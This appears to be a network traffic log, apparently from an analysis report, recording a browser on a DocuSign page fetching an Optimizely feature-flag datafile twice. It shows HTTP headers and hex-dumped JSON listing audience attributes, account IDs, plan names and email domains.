2024-10-29 17:45:17 UTC	507	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: X-MP-CE-Backoff Access-Control-Max-Age: 1728000 Cache-Control: no-cache, no-store Content-Type: application/json Strict-Transport-Security: max-age=604800; includeSubDomains Date: Tue, 29 Oct 2024 17:45:17 GMT Content-Length: 1 Via: 1.1 google Alt-Svc: clear Connection: close
2024-10-29 17:45:17 UTC	1	IN	Data Raw: 31 Data Ascii: 1

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:30 UTC	582	OUT	GET /datafiles/MUGKFLCdCtxUSgrSTyhbw.json HTTP/1.1 Host: cdn.optimizely.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://eu.docusign.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://eu.docusign.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:45:30 UTC	998	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:45:30 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close x-amz-id-2: yujqZADuk8r0k+e1rISCoXdhhopqu+ZhpvKTEyxAq4dF2MgihX8j3NW2yGMTse5wW0sjSOiMuS4= x-amz-request-id: B3FP5CAPCR1Q0EJ0 Access-Control-Expose-Headers: Access-Control-Allow-Origin, Content-Length Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method x-amz-replication-status: PENDING Last-Modified: Fri, 25 Oct 2024 22:27:59 GMT ETag: W/"51f34785d2ca2ed3c8e0a2fe8b2111be" x-amz-server-side-encryption: AES256 Cache-Control: max-age=120 x-amz-meta-revision: 108 x-amz-meta-pci_enabled: False x-amz-version-id: cGOEH8XdqhZZGEhEEYjB9U9nl2H7l7Qn CF-Cache-Status: HIT Age: 29 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Max-Age: 604800 Server: cloudflare CF-RAY: 8da4facbb9a546de-DFW
2024-10-29 17:45:30 UTC	371	IN	Data Raw: 35 32 35 33 0d 0a 7b 22 61 63 63 6f 75 6e 74 49 64 22 3a 22 32 37 35 35 33 32 39 31 38 22 2c 22 70 72 6f 6a 65 63 74 49 64 22 3a 22 32 38 39 37 39 37 32 30 35 33 34 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 22 31 30 38 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 5b 7b 22 69 64 22 3a 22 32 38 39 36 30 35 39 30 33 39 38 22 2c 22 6b 65 79 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 7d 2c 7b 22 69 64 22 3a 22 32 38 39 39 35 32 30 30 34 36 32 22 2c 22 6b 65 79 22 3a 22 61 63 63 6f 75 6e 74 5f 69 64 22 7d 2c 7b 22 69 64 22 3a 22 32 39 30 35 39 39 36 30 31 33 31 22 2c 22 6b 65 79 22 3a 22 72 69 6e 67 22 7d 2c 7b 22 69 64 22 3a 22 32 39 37 33 32 37 35 30 30 38 36 22 2c 22 6b 65 79 22 3a 22 69 73 43 61 70 74 69 76 65 52 65 63 69 70 69 65 6e 74 22 7d 2c Data Ascii: 5253{"accountId":"275532918","projectId":"28979720534","revision":"108","attributes":[{"id":"28960590398","key":"senderAccountId"},{"id":"28995200462","key":"account_id"},{"id":"29059960131","key":"ring"},{"id":"29732750086","key":"isCaptiveRecipient"},
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 7d 2c 7b 22 69 64 22 3a 22 32 39 37 37 31 39 32 30 30 35 39 22 2c 22 6b 65 79 22 3a 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 2c 7b 22 69 64 22 3a 22 33 30 31 36 31 38 39 30 37 31 33 22 2c 22 6b 65 79 22 3a 22 75 73 65 72 4c 61 6e 67 75 61 67 65 22 7d 2c 7b 22 69 64 22 3a 22 33 30 32 33 33 32 38 30 31 37 39 22 2c 22 6b 65 79 22 3a 22 62 72 6f 77 73 65 72 4c 61 6e 67 75 61 67 65 22 7d 2c 7b 22 69 64 22 3a 22 33 30 32 34 37 30 39 30 30 37 31 22 2c 22 6b 65 79 22 3a 22 69 73 4d 6f 62 69 6c 65 22 7d 2c 7b 22 69 64 22 3a 22 34 37 33 39 30 36 35 35 38 39 37 39 32 37 36 38 22 2c 22 6b 65 79 22 3a 22 69 73 4e 6f 74 61 72 79 22 7d 2c 7b 22 69 64 22 3a 22 35 30 33 38 33 36 36 39 39 34 34 36 34 37 36 38 22 2c 22 6b 65 79 22 3a Data Ascii: tEmailDomain"},{"id":"29771920059","key":"environment"},{"id":"30161890713","key":"userLanguage"},{"id":"30233280179","key":"browserLanguage"},{"id":"30247090071","key":"isMobile"},{"id":"4739065589792768","key":"isNotary"},{"id":"5038366994464768","key":
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 50 6c 61 74 66 6f 72 6d 20 51 41 5c 22 7d 5d 5d 5d 22 2c 22 6e 61 6d 65 22 3a 22 70 6c 61 74 51 41 22 7d 2c 7b 22 69 64 22 3a 22 36 36 34 39 30 38 38 34 35 35 32 31 33 30 35 36 22 2c 22 63 6f 6e 64 69 74 69 6f 6e 73 22 3a 22 5b 5c 22 61 6e 64 5c 22 2c 20 5b 5c 22 6f 72 5c 22 2c 20 5b 5c 22 6f 72 5c 22 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 65 65 33 32 31 36 31 34 2d 64 32 65 35 2d 34 65 66 65 2d 62 36 37 64 2d 38 37 34 33 39 35 31 32 36 Data Ascii: ute\", \"value\": \"Platform QA\"}]]]","name":"platQA"},{"id":"6649088455213056","conditions":"[\"and\", [\"or\", [\"or\", {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"ee321614-d2e5-4efe-b67d-874395126
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 66 30 63 34 65 61 65 39 65 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 66 64 34 38 61 37 62 63 2d 63 30 37 34 2d 34 33 62 32 2d 61 36 63 34 2d 65 33 33 65 31 34 65 39 36 31 36 38 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 37 33 Data Ascii: f0c4eae9e\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"fd48a7bc-c074-43b2-a6c4-e33e14e96168\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"73
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 3a 20 5c 22 64 32 65 63 61 61 33 61 2d 65 38 66 62 2d 34 33 65 33 2d 61 39 61 34 2d 36 31 31 34 38 66 61 33 64 31 65 31 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 31 34 33 39 37 38 35 38 2d 63 30 34 63 2d 34 34 38 39 2d 39 34 37 65 2d 30 35 63 33 30 31 39 61 37 31 66 36 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 Data Ascii: : \"d2ecaa3a-e8fb-43e3-a9a4-61148fa3d1e1\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"14397858-c04c-4489-947e-05c3019a71f6\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"cust
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 39 35 66 34 66 65 38 64 2d 64 30 37 30 2d 34 37 66 32 2d 39 65 30 39 2d 32 38 32 38 62 30 39 31 66 36 32 34 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 66 31 30 61 31 34 34 30 2d 30 31 33 65 2d 34 31 61 38 2d 39 62 64 39 2d 31 33 63 33 66 31 33 33 31 61 64 61 5c 22 7d 5d 5d 5d 22 2c 22 6e 61 6d 65 22 3a 22 72 6f 6c 6c 6f 75 74 53 69 67 6e 69 6e 67 56 33 5f 6f 70 74 5f 6f 75 74 5f 6c 69 73 Data Ascii: \"custom_attribute\", \"value\": \"95f4fe8d-d070-47f2-9e09-2828b091f624\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"f10a1440-013e-41a8-9bd9-13c3f1331ada\"}]]]","name":"rolloutSigningV3_opt_out_lis
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 65 6d 61 69 6c 2e 63 6f 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 63 6f 6d 63 61 73 74 2e 6e 65 74 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 71 71 2e 63 6f 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 Data Ascii: m_attribute","value":"email.com"},{"match":"exact","name":"recipientEmailDomain","type":"custom_attribute","value":"comcast.net"},{"match":"exact","name":"recipientEmailDomain","type":"custom_attribute","value":"qq.com"},{"match":"exact","name":"recipient
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 42 75 73 69 6e 65 73 73 20 46 72 65 65 6d 69 75 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 43 6f 6e 73 75 6d 65 72 20 46 72 65 65 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 Data Ascii: nderAccountPlanName","type":"custom_attribute","value":"Business Freemium"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Consumer Free"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 75 65 22 3a 22 47 6f 6f 67 6c 65 20 44 6f 63 73 20 47 53 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 47 6f 6f 67 6c 65 20 44 72 69 76 65 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 50 6c 61 6e 4e 61 6d 65 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 47 6f 6f 67 6c 65 20 47 6d 61 69 6c 20 47 53 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 Data Ascii: ue":"Google Docs GS"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Google Drive"},{"match":"exact","name":"senderAccountPlanName","type":"custom_attribute","value":"Google Gmail GS"},{"match":"exact","name":"senderAcc
2024-10-29 17:45:30 UTC	1369	IN	Data Raw: 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 66 31 30 61 31 34 34 30 2d 30 31 33 65 2d 34 31 61 38 2d 39 62 64 39 2d 31 33 63 33 66 31 33 33 31 61 64 61 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 31 33 32 62 33 34 37 36 2d 62 64 63 37 2d 34 38 65 39 2d 38 66 31 61 2d 64 31 30 35 65 62 32 66 36 34 66 64 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 Data Ascii: name":"senderAccountId","type":"custom_attribute","value":"f10a1440-013e-41a8-9bd9-13c3f1331ada"},{"match":"exact","name":"senderAccountId","type":"custom_attribute","value":"132b3476-bdc7-48e9-8f1a-d105eb2f64fd"},{"match":"exact","name":"senderAccountId"

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:45:31 UTC	378	OUT	GET /datafiles/MUGKFLCdCtxUSgrSTyhbw.json HTTP/1.1 Host: cdn.optimizely.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:45:31 UTC	998	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:45:31 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close x-amz-id-2: yujqZADuk8r0k+e1rISCoXdhhopqu+ZhpvKTEyxAq4dF2MgihX8j3NW2yGMTse5wW0sjSOiMuS4= x-amz-request-id: B3FP5CAPCR1Q0EJ0 Access-Control-Expose-Headers: Access-Control-Allow-Origin, Content-Length Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method x-amz-replication-status: PENDING Last-Modified: Fri, 25 Oct 2024 22:27:59 GMT ETag: W/"51f34785d2ca2ed3c8e0a2fe8b2111be" x-amz-server-side-encryption: AES256 Cache-Control: max-age=120 x-amz-meta-revision: 108 x-amz-meta-pci_enabled: False x-amz-version-id: cGOEH8XdqhZZGEhEEYjB9U9nl2H7l7Qn CF-Cache-Status: HIT Age: 30 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Access-Control-Allow-Headers: * Access-Control-Allow-Credentials: false Access-Control-Max-Age: 604800 Server: cloudflare CF-RAY: 8da4fad15f614749-DFW
2024-10-29 17:45:31 UTC	371	IN	Data Raw: 35 32 35 33 0d 0a 7b 22 61 63 63 6f 75 6e 74 49 64 22 3a 22 32 37 35 35 33 32 39 31 38 22 2c 22 70 72 6f 6a 65 63 74 49 64 22 3a 22 32 38 39 37 39 37 32 30 35 33 34 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 22 31 30 38 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 5b 7b 22 69 64 22 3a 22 32 38 39 36 30 35 39 30 33 39 38 22 2c 22 6b 65 79 22 3a 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 22 7d 2c 7b 22 69 64 22 3a 22 32 38 39 39 35 32 30 30 34 36 32 22 2c 22 6b 65 79 22 3a 22 61 63 63 6f 75 6e 74 5f 69 64 22 7d 2c 7b 22 69 64 22 3a 22 32 39 30 35 39 39 36 30 31 33 31 22 2c 22 6b 65 79 22 3a 22 72 69 6e 67 22 7d 2c 7b 22 69 64 22 3a 22 32 39 37 33 32 37 35 30 30 38 36 22 2c 22 6b 65 79 22 3a 22 69 73 43 61 70 74 69 76 65 52 65 63 69 70 69 65 6e 74 22 7d 2c Data Ascii: 5253{"accountId":"275532918","projectId":"28979720534","revision":"108","attributes":[{"id":"28960590398","key":"senderAccountId"},{"id":"28995200462","key":"account_id"},{"id":"29059960131","key":"ring"},{"id":"29732750086","key":"isCaptiveRecipient"},
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 7d 2c 7b 22 69 64 22 3a 22 32 39 37 37 31 39 32 30 30 35 39 22 2c 22 6b 65 79 22 3a 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 2c 7b 22 69 64 22 3a 22 33 30 31 36 31 38 39 30 37 31 33 22 2c 22 6b 65 79 22 3a 22 75 73 65 72 4c 61 6e 67 75 61 67 65 22 7d 2c 7b 22 69 64 22 3a 22 33 30 32 33 33 32 38 30 31 37 39 22 2c 22 6b 65 79 22 3a 22 62 72 6f 77 73 65 72 4c 61 6e 67 75 61 67 65 22 7d 2c 7b 22 69 64 22 3a 22 33 30 32 34 37 30 39 30 30 37 31 22 2c 22 6b 65 79 22 3a 22 69 73 4d 6f 62 69 6c 65 22 7d 2c 7b 22 69 64 22 3a 22 34 37 33 39 30 36 35 35 38 39 37 39 32 37 36 38 22 2c 22 6b 65 79 22 3a 22 69 73 4e 6f 74 61 72 79 22 7d 2c 7b 22 69 64 22 3a 22 35 30 33 38 33 36 36 39 39 34 34 36 34 37 36 38 22 2c 22 6b 65 79 22 3a Data Ascii: tEmailDomain"},{"id":"29771920059","key":"environment"},{"id":"30161890713","key":"userLanguage"},{"id":"30233280179","key":"browserLanguage"},{"id":"30247090071","key":"isMobile"},{"id":"4739065589792768","key":"isNotary"},{"id":"5038366994464768","key":
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 50 6c 61 74 66 6f 72 6d 20 51 41 5c 22 7d 5d 5d 5d 22 2c 22 6e 61 6d 65 22 3a 22 70 6c 61 74 51 41 22 7d 2c 7b 22 69 64 22 3a 22 36 36 34 39 30 38 38 34 35 35 32 31 33 30 35 36 22 2c 22 63 6f 6e 64 69 74 69 6f 6e 73 22 3a 22 5b 5c 22 61 6e 64 5c 22 2c 20 5b 5c 22 6f 72 5c 22 2c 20 5b 5c 22 6f 72 5c 22 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 65 65 33 32 31 36 31 34 2d 64 32 65 35 2d 34 65 66 65 2d 62 36 37 64 2d 38 37 34 33 39 35 31 32 36 Data Ascii: ute\", \"value\": \"Platform QA\"}]]]","name":"platQA"},{"id":"6649088455213056","conditions":"[\"and\", [\"or\", [\"or\", {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"ee321614-d2e5-4efe-b67d-874395126
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 66 30 63 34 65 61 65 39 65 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 66 64 34 38 61 37 62 63 2d 63 30 37 34 2d 34 33 62 32 2d 61 36 63 34 2d 65 33 33 65 31 34 65 39 36 31 36 38 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 37 33 Data Ascii: f0c4eae9e\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"fd48a7bc-c074-43b2-a6c4-e33e14e96168\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"73
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 3a 20 5c 22 64 32 65 63 61 61 33 61 2d 65 38 66 62 2d 34 33 65 33 2d 61 39 61 34 2d 36 31 31 34 38 66 61 33 64 31 65 31 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 31 34 33 39 37 38 35 38 2d 63 30 34 63 2d 34 34 38 39 2d 39 34 37 65 2d 30 35 63 33 30 31 39 61 37 31 66 36 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 Data Ascii: : \"d2ecaa3a-e8fb-43e3-a9a4-61148fa3d1e1\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"14397858-c04c-4489-947e-05c3019a71f6\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"cust
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 39 35 66 34 66 65 38 64 2d 64 30 37 30 2d 34 37 66 32 2d 39 65 30 39 2d 32 38 32 38 62 30 39 31 66 36 32 34 5c 22 7d 2c 20 7b 5c 22 6d 61 74 63 68 5c 22 3a 20 5c 22 65 78 61 63 74 5c 22 2c 20 5c 22 6e 61 6d 65 5c 22 3a 20 5c 22 73 65 6e 64 65 72 41 63 63 6f 75 6e 74 49 64 5c 22 2c 20 5c 22 74 79 70 65 5c 22 3a 20 5c 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 5c 22 2c 20 5c 22 76 61 6c 75 65 5c 22 3a 20 5c 22 66 31 30 61 31 34 34 30 2d 30 31 33 65 2d 34 31 61 38 2d 39 62 64 39 2d 31 33 63 33 66 31 33 33 31 61 64 61 5c 22 7d 5d 5d 5d 22 2c 22 6e 61 6d 65 22 3a 22 72 6f 6c 6c 6f 75 74 53 69 67 6e 69 6e 67 56 33 5f 6f 70 74 5f 6f 75 74 5f 6c 69 73 Data Ascii: \"custom_attribute\", \"value\": \"95f4fe8d-d070-47f2-9e09-2828b091f624\"}, {\"match\": \"exact\", \"name\": \"senderAccountId\", \"type\": \"custom_attribute\", \"value\": \"f10a1440-013e-41a8-9bd9-13c3f1331ada\"}]]]","name":"rolloutSigningV3_opt_out_lis
2024-10-29 17:45:31 UTC	1369	IN	Data Raw: 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 65 6d 61 69 6c 2e 63 6f 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 63 6f 6d 63 61 73 74 2e 6e 65 74 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 45 6d 61 69 6c 44 6f 6d 61 69 6e 22 2c 22 74 79 70 65 22 3a 22 63 75 73 74 6f 6d 5f 61 74 74 72 69 62 75 74 65 22 2c 22 76 61 6c 75 65 22 3a 22 71 71 2e 63 6f 6d 22 7d 2c 7b 22 6d 61 74 63 68 22 3a 22 65 78 61 63 74 22 2c 22 6e 61 6d 65 22 3a 22 72 65 63 69 70 69 65 6e 74 Data Ascii: m_attribute","value":"email.com"},{"match":"exact","name":"recipientEmailDomain","type":"custom_attribute","value":"comcast.net"},{"match":"exact","name":"recipientEmailDomain","type":"custom_attribute","value":"qq.com"},{"match":"exact","name":"recipient
